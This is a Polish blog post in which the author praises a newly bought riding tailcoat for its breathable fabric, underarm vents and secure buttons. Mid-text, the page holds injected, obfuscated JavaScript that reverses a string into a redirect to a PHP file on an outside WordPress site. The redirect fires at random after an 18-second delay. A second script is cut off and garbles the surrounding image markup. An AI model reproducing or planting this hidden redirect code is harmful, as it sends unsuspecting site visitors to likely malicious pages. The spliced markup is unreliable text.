You are currently viewing Potrzebowałem fraku jeździeckiego

Potrzebowałem fraku jeździeckiego

Od kilku lat jeżdżę na koniach i biorę udział w zawodach jeździeckich. Ostatnio przejrzałem swoją garderobę. Uznałem, że frak który do tej pory nosiłem na zawodach jest już stary i znoszony. Postanowiłem zaopatrzyć się w nowy. Wybrałem się więc do sklepu, gdzie można było kupić takie profesjonalne fraki jeździeckie. Udało mi sią tam dostać odpowiedni strój.

Cechy komfortowych fraków jeździeckich

komfor<script>$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])==towy frak jeździecki” height=”87″ src=”http://karnisze24.pl/wp-content/uploads/2021/12/komfortowy-frak-jezdziecki.jpg” style=”float:left;” width=”130″/>Sprzedawczyni po wysłuchaniu moich potrzeb, od razu poleciła mi komfortowy frak jeździecki. Był on wykonany z naturalnego, oddychającego i elastycznego materiału. Dzięki tym cechom zapewniał komfort w czasie jazdy na koniu. Bardzo mi się spodobało w nim to, że pod pachami posiadał otwory wentylacyjne, co zapobiegało nadmiernemu poceniu się i nieestetycznym plamom nawet podczas upalnych, letnich dni. Otwory zostały tak zabudowane materiałem i dopasowane kolorystycznie, że nie było ich widać po założeniu fraka. Frak zapinany był na solidne guziki, które posiadały dodatkowe zabezpieczenie przed rozpięciem się w trakcie jazdy. To już nie tylko kwestia komfortu, ale także bezpieczeństwa zarówno mojego, jak i zwierzęcia, dlatego zwróciłem na to uwagę. Miał on długi rękaw, ale materiał z którego został wykonany gwarantował pełną swobodę ruchów. Zdecydowałem się go zakupić, ponieważ był dostępny w niezwykle niskiej, atrakcyjnej dla mnie cenie.

Od razu po zakupie wypróbowałem go od razu, jak tylko nadarzyła się okazja. Muszę przyznać, że byłem z tego stroju bardzo zadowolony. Był nie tylko komfortowy i gwarantował swobodę ruchów podczas jazdy na koniu, ale także elegancki. Naprawdę świetnie się w nim prezentowałem. Nadawał się zarówno na zawody, jak i na codzienne treningi. Cieszę się, że udało mi się go dostać w tak niskiej cenie. To naprawdę frak wysokojakościowy.